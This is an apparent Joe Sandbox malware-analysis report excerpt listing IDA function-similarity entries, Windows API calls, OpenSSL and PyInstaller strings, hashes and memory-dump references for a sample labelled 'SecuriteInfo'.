• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD4D
• GetLastError.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD5B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD85
• FreeLibrary.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDF3
• GetProcAddress.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDFF
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
• Instruction ID: 2c713b49549d6f197d2fde16d52d0d293cb4c8df6ec7ff3b1af5dffb154b89d4
• Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
• Instruction Fuzzy Hash: 8B31A121B1A74291FE12EB06A4407B9A395FF48FA8F994577ED5D07388EF7CE4448231
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7EAD0351A,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD02AA0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction ID: f5e54560c04cc6bca7bda04a6944ccef72f7451e5b81d96eeb26d12b1cbd133b
• Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction Fuzzy Hash: 29217F72A19B8142F720EB61B8817E6A7A4FB88784F800176FE8D4365DDF7CD245C651
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction ID: 7a205ca501030bbe37e45ae4147238bd0d51d1dbba501999e9b6e4a0af08ac41
• Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction Fuzzy Hash: ED216F31A0C64242FB10EB55B58432EE3A5EB817A4FD00276EAAC43BECDEBCD4558721
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
• Instruction ID: 8a3ba129aaf0e41bd238301cd0bc4d9668ea0521642bac162b1e70f298d2df74
• Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
• Instruction Fuzzy Hash: BD215C30E0964281F655F3319652379D396DF687B0F8146B7D93E476DEDD3CA8808222
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: getservbyporthtons
• String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
• API String ID: 3477891686-2618607128
• Opcode ID: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
• Instruction ID: 36e880a631399776a2b2199e98d4a8e9082cc79d6a3b1e5f770aa2a7a57a7e92
• Opcode Fuzzy Hash: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
• Instruction Fuzzy Hash: 51210931A18A0382EB109BA1E88477D7371FB86BC5F560031DA8E57668DF3DE499C70A
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: 7bd9408958f38dd35ee73b0b19f1becb0e3da1c08a021a71317dd89eae2cf5ae
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 7311B131A18B4282F760EB12E844329A3A4FB88BF4F840275EA5D87798CF7CD814C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                              • API String ID: 3464486852-1635961163
                                                                                                                                                                                                                              • Opcode ID: f98c1f9ab64da6bd1c0876dbebf8bdfa299ed10f1d79f079bfe0f178839aff30
                                                                                                                                                                                                                              • Instruction ID: 68d787a6a59951a8f4de5357ea641e6fb8a5262cd7456c8115e0b959be6e0049
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f98c1f9ab64da6bd1c0876dbebf8bdfa299ed10f1d79f079bfe0f178839aff30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7029B32B08B8281F7508B96E4867BD77A0EB84BC4F548136EAAD47795DF3CE591C702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08EFD
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08F5A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08FE5
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09044
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09055
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD0906A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction ID: 13a75050ef9c01607e677343f9a0904565bb5ea5655d81eefebb84b5324e9fba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8241B761A1968281FA30EB61E5803BAB395FB84BC8F840176DF4D5779DDE3CE500C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetCurrentProcess.KERNEL32 ref: 00007FF7EAD08590
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: OpenProcessToken.ADVAPI32 ref: 00007FF7EAD085A3
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.ADVAPI32 ref: 00007FF7EAD085C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetLastError.KERNEL32 ref: 00007FF7EAD085D2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.ADVAPI32 ref: 00007FF7EAD08612
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7EAD0862E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: CloseHandle.KERNEL32 ref: 00007FF7EAD08646
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD0916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD09175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction ID: 5faf2dcf634453205b20e61b94ecc619cba160dcf0766a63f7d000a4e0d2f3cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF214F21A0864281F610FB20E8593EAA3A6FF94784FC44077EA4D4379ADF3CD945C762
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 174288908-0
                                                                                                                                                                                                                              • Opcode ID: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                              • Instruction ID: fea1a7b5399a9b337f2129743e0eb2d25d3df6d05b8b8a06ba288240542d7c45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7215020B0CB4282FA645BA1A8183BD2290AF89BF4F061735DD2E067D4DF3CE044C606
                                                                                                                                                                                                                              APIs
• GetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B35C
• SetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B377
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
• Instruction ID: 10b2ff77d91ebd9834225588a6c44b9d8dad45fda4d32e8db72292485a5836d3
• Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
• Instruction Fuzzy Hash: 01114930E0D64282FA58F331964137DD386DF687B0F8446B6E92E476DEDE3CA8518322
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction ID: ae51f5d1fe83f2c971d4e73fef52d4a43429731f2b0db052b25811b2ee4d1c3f
• Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction Fuzzy Hash: 2C31CF22B1968152F720E765A8803E6A395FF887D8F800133FE8D8374DEE7CD14AC621
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
• Instruction ID: 7d026c2daf2c81c5c0280fff79927e456b28180bb2e537748e3cb749f588f78a
• Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
• Instruction Fuzzy Hash: 28316372A19A8189FB20EB21E8553F9A364FF88788F840176EA4D47B5DDF3CD105C721
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
• API String ID: 0-1751716127
• Opcode ID: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
• Instruction ID: c94e844e57524290fd104842182c2d369d37aa6f4fdddf50dc90d9913178daba
• Opcode Fuzzy Hash: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
• Instruction Fuzzy Hash: D0316161A18B8681EA209BA5F8447FE6364FF89BD4F460132DE8E43754DF3CE449C749
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7EAD0918F,?,00007FF7EAD03C55), ref: 00007FF7EAD02BA0
